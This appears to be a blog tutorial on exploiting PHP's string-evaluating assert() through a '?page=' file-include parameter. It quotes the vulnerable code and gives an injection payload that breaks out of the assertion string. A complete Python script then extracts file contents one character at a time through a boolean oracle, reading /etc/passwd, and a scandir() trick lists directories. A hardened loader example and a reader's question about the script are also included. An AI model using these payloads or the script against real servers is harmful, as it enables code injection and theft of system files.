PHP assert() Vulnerable to Local File Inclusion
Consider the following URL:
http://example.com/index.php/?page=home
The first thing that comes to mind on seeing a "?page=" parameter is a local file inclusion (LFI). To test for it, point the parameter at a file we know exists, such as "index.php" or "/etc/passwd":
http://example.com/index.php/?page=../../../../../etc/passwd
The application replies with a warning of the form "Warning: assert(): Assertion "strpos('includes/../../../../../etc/passwd.php', '..') === false" failed in /var/www/html/index.php on line 8", followed by "Detected hacking attempt!".
-> The warning leaks the assertion expression and tells us two things: the application passes a string to assert(), which PHP (before 8.0) evaluates as PHP code, and our page value is interpolated straight into that string. Anything we place after a closing quote is therefore executed as PHP, not merely checked for "..".
The PHP code used by the application looks like this:
```php
<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}
$file = "includes/" . $page . ".php";
// vulnerable code! $file (user input) is interpolated into a string that assert() evaluates as PHP
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
?>
```
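As an added example (not part of the original post), here is the same page loader with the assert() oracle removed and the page name validated rather than scanned for "..". The includes/ directory, the "File does not exist" message and the identifier pattern are assumptions taken from the page's behaviour; adjust them to the real application. The code targets PHP 7.1 or later. Note that from PHP 8.0 assert() no longer evaluates a string argument at all, which removes this code-injection bug class but does nothing about the path traversal itself.

```php
<?php
// Added example, not the original application's code.
// Assumption: valid pages live in includes/<name>.php and <name> is a
// simple identifier. Tighten the pattern or switch to an explicit
// allowlist array if the real set of pages is known.

const INCLUDE_DIR = __DIR__ . '/includes';

/**
 * Resolve a user-supplied page name to a file path inside INCLUDE_DIR,
 * or return null if the request is not acceptable.
 */
function resolve_page(string $page): ?string
{
    // 1. Shape check: only identifier-like names are ever looked up, so
    //    "../", quotes, NUL bytes and PHP syntax never reach a filesystem call.
    if (!preg_match('/^[a-z0-9_-]{1,32}$/i', $page)) {
        return null;
    }

    // 2. Containment check: realpath() canonicalises symlinks and "..", and
    //    the result must still sit below the canonical include directory.
    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
$file = resolve_page($page);

// Every rejection produces the same response, so there is no boolean oracle.
if ($file === null) {
    http_response_code(404);
    exit('File does not exist');
}

// assert() is still fine for genuine invariants, but only with a boolean
// expression. A string argument is evaluated as code on PHP < 8 and must never
// contain request data. In production set zend.assertions = -1 so assertions
// are compiled out and cannot become a control-flow or information oracle.
assert(strpos($file, '..') === false);

require $file;
```

The shape check is the real control; realpath() containment is a second line of defence for the case where the pattern is later loosened. Because a bad name and a missing file now produce the identical response, an attacker can no longer turn the check into a yes/no question.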
Let's inject code that reads a file's contents using a blind (boolean) technique. The page value closes the open string literal, appends our own condition, and opens another strpos() call so that the ".php', '..') === false" the application appends still parses:
', 'qwer') === false && strlen(file_get_contents("../../../../../etc/passwd")) == 0 && strpos('1
-> When the injected condition is FALSE the assertion fails and the server responds with "Warning: assert(): Assertion "strpos('includes/', 'qwer') === false && strlen(file_get_contents("../../../../../etc/passwd")) == 0 && strpos('1.php', '..') === false" failed in /var/www/html/index.php on line 8", followed by "Detected hacking attempt!".
-> When the condition is TRUE the assertion passes, the script goes on to look for the (nonexistent) file and responds with "File does not exist".
So the warning (and "Detected hacking attempt!") means FALSE and "File does not exist" means TRUE: a reliable one-bit oracle for any PHP expression we can phrase as a condition.
The Python 3 script to read a file's contents:
```python
import base64
import string
import requests

url = "http://example.com/index.php/"

# The injected page value closes the first strpos() string literal, appends our
# condition and opens a new strpos() so that the ".php', '..') === false" added
# by the application still parses. The evaluated assertion becomes:
#   strpos('includes/', 'qwer') === false && <condition> && strpos('1.php', '..') === false
base = "', 'qwer') === false && %s && strpos('1"


def check(condition):
    """Return True if the injected condition evaluated to TRUE on the server.

    A FALSE assertion prints the "Warning: assert(): Assertion ... failed" message;
    a TRUE one lets the script continue to its normal "File does not exist" output.
    """
    r = requests.get(url, params={'page': base % condition})
    return "Warning" not in r.text


def get_len(path):
    """Find the exact length of the file at `path`, ten bytes at a time."""
    i = 10
    while True:
        if check('strlen(file_get_contents("%s")) < %d' % (path, i)):
            for j in range(i - 10, i):
                if check('strlen(file_get_contents("%s")) == %d' % (path, j)):
                    print("Found Length = %d" % j)
                    return j
        i += 10


def read_file_contents(path):
    """Recover the file by comparing ever longer prefixes of its contents."""
    length = get_len(path)
    s = ""
    while len(s) < length:
        for c in string.printable:
            tmp = s + c
            # base64 keeps quotes, newlines and other awkward characters out of the payload
            b64 = base64.b64encode(tmp.encode()).decode()
            condition = 'substr(file_get_contents("%s"), 0, %d) == base64_decode("%s")' % (
                path, len(tmp), b64)
            if check(condition):
                s = tmp
                print(s)
                break
        else:
            # no printable character matched: the file contains a byte outside string.printable
            print("Unknown byte at offset %d, stopping" % len(s))
            break
    return s


print(read_file_contents('../../../../../../etc/passwd'))
```
With this primitive you can read any file and list any directory the web server's user has access to. To enumerate a directory first, swap file_get_contents("path") in the payload for implode(" ", scandir('path_to_directory')): scandir() returns the directory entries as an array and implode() joins them into a single space-separated string, which the same blind extraction can then dump character by character.
I have some problems with the code… Which version of Python is it?
Thanks…